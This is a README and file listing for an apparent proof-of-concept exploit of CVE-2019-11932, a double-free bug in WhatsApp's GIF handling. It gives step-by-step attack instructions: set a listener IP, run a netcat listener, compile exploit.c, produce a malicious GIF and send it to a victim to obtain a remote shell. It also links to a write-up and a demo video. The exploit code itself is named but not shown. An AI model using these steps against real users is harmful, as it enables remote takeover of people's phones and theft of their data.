The exploit works well until WhatsApp version 2.19.230. The vulnerability is official patched in WhatsApp version 2.19.244# CVE-2019-11932
double-free bug in WhatsApp exploit poc.
#Note: make sure to set the listner ip in exploit.c inorder to get shell
nc -lvp 5555 or whatever port.
and then compile.
gcc -o exploit egif_lib.c exploit.c
then run ./exploit and save the content to <filename>.gif
and send to victim.
#Source
https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/.
#Poc_Video
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view.
#News_Article
https://gbhackers.com/whatsapp-double-free-vulnerability/
[4.0K] /data/pocs/90bbae1c347823541e66ccaa65733d667c55f92a
├── [3.3K] egif_lib.c
├── [5.2K] exploit.c
├── [ 11K] gif_lib.h
└── [ 568] README.md
0 directories, 4 files